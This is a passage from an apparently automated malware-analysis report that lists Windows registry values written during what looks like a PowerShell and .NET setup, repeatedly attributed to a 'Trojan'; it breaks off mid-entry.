"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "207"
"StoreChangeIDFor64BitProcesses" = "185"
"StoreChangeIDFor32BitProcesses" = "206"

The process PSCustomSetupUtil.exe:2304 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "11 BD 9A 35 58 02 51 58 91 ED 4D 79 6B 18 2E 0D"

[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"Path" = "C:\Perl\site\bin;C:\Perl\bin;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;c:\Program Files\Wireshark;%System%\WindowsPowerShell\v1.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process PSCustomSetupUtil.exe:2176 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "77 3E 2B C6 BC BE 80 5E 57 0C EC DF 62 3B EF A3"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "76 00 1D B5 05 2F D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "194"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "195"
"StoreChangeIDFor64BitProcesses" = "173"
"StoreChangeIDFor32BitProcesses" = "194"

The process PSCustomSetupUtil.exe:2684 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CA 8B 2B F7 E9 FF 76 1B 90 F9 FA 7C 65 7B EB B4"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Security.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "9E C5 6D B8 05 2F D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Security.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "200"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "201"
"StoreChangeIDFor64BitProcesses" = "179"
"StoreChangeIDFor32BitProcesses" = "200"

The process PSCustomSetupUtil.exe:500 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "32 77 33 01 05 C4 3E B1 FE 7D 2F 8E DE 13 41 B2"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Security,1.0.0.0,,31bf3856ad364e35,MSIL" = "16 9F AF B1 05 2F D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "191"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "192"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Security, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "170"
"StoreChangeIDFor32BitProcesses" = "191"

The process PSCustomSetupUtil.exe:2460 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "69 57 18 51 D8 08 76 69 67 4E 2F 71 8F F6 C8 E8"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "26 B1 D3 B6 05 2F D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "198"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "199"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "177"
"StoreChangeIDFor32BitProcesses" = "198"

The process PSCustomSetupUtil.exe:2624 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1E 96 88 75 BA 68 D1 E5 9A BC B8 C4 0C 13 0D 92"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"PATHEXT" = ".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.PSC1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process PSCustomSetupUtil.exe:2704 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "13 28 41 EB B4 AD A4 B9 07 F9 39 BE E1 34 8F A6"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process PSCustomSetupUtil.exe:2284 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9C FB 58 D5 39 1D F8 B1 52 A1 9D AB C1 BB 68 13"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "EE E7 85 B5 05 2F D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.BackgroundIntelligentTransfer.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "195"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "196"
"StoreChangeIDFor64BitProcesses" = "174"
"StoreChangeIDFor32BitProcesses" = "195"

The process PSCustomSetupUtil.exe:2588 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F3 C9 F8 BE FA 3F 61 91 09 A5 36 44 FD 2E E5 71"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Diagnostics.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "66 56 82 B9 05 2F D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "201"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "202"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Diagnostics.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "180"
"StoreChangeIDFor32BitProcesses" = "201"

The process PSCustomSetupUtil.exe:3464 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "02 85 3D D8 2C 8B 87 B3 96 3C 42 C8 83 EA 80 9C"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GPowerShell.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "7E 52 2E C7 05 2F D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GPowerShell.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "210"
"StoreChangeIDFor64BitProcesses" = "188"
"StoreChangeIDFor32BitProcesses" = "209"

The process PSCustomSetupUtil.exe:224 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5E 52 2A 71 45 82 9F 0C 1A DE 0C 9D B8 B1 07 64"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35,MSIL" = "72 65 3B B3 05 2F D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Diagnostics, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "192"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "193"
"StoreChangeIDFor64BitProcesses" = "171"
"StoreChangeIDFor32BitProcesses" = "192"

The process PSCustomSetupUtil.exe:1880 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "09 97 22 F1 BA C2 F3 3F 70 2E 66 AE 5F 49 C7 7F"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "196"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "197"
"System.Management.Automation.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "28 BB FA B5 05 2F D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\System.Management.Automation.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "175"
"StoreChangeIDFor32BitProcesses" = "196"

The process PSCustomSetupUtil.exe:3392 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0C 0C 73 22 7D 09 9F 4D 48 16 83 86 CD F4 CE 2B"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Editor.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "208"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "209"
"Microsoft.PowerShell.Editor.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "CE CE A8 C6 05 2F D1 01"
"StoreChangeIDFor64BitProcesses" = "187"
"StoreChangeIDFor32BitProcesses" = "208"

The process PSCustomSetupUtil.exe:780 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "06 80 75 82 81 70 B9 22 C1 B1 0E 17 3D 58 EB AE"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Runtime, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "193"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Runtime,1.0.0.0,,31bf3856ad364e35,MSIL" = "A0 48 01 B4 05 2F D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "194"
"StoreChangeIDFor64BitProcesses" = "172"
"StoreChangeIDFor32BitProcesses" = "193"

The process PSCustomSetupUtil.exe:2556 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 E8 72 A1 47 61 73 37 11 37 7D 89 8A BA 28 B3"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "36 96 C6 BA 05 2F D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "202"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "203"
"StoreChangeIDFor64BitProcesses" = "181"
"StoreChangeIDFor32BitProcesses" = "202"

The process PSCustomSetupUtil.exe:3784 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "31 37 A6 2A 1C F8 0E B5 31 56 FC C0 69 6B A2 CB"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "188"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35,MSIL" = "04 B0 95 AE 05 2F D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "189"
"StoreChangeIDFor64BitProcesses" = "167"
"StoreChangeIDFor32BitProcesses" = "188"

The process PSCustomSetupUtil.exe:2572 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "93 4C BC 00 E7 03 F5 6C FA 53 4E BD 2D 8A 4B 65"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "199"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "200"
"Microsoft.PowerShell.Commands.Utility.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "02 E1 C6 B7 05 2F D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Utility.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "178"
"StoreChangeIDFor32BitProcesses" = "199"

The process mscorsvw.exe:3848 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "0"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "0"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "02 F9 86 89 ED AB 6A 7C 34 AE C1 C9 41 D1 78 26"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 1C 01 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

The process mscorsvw.exe:3568 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
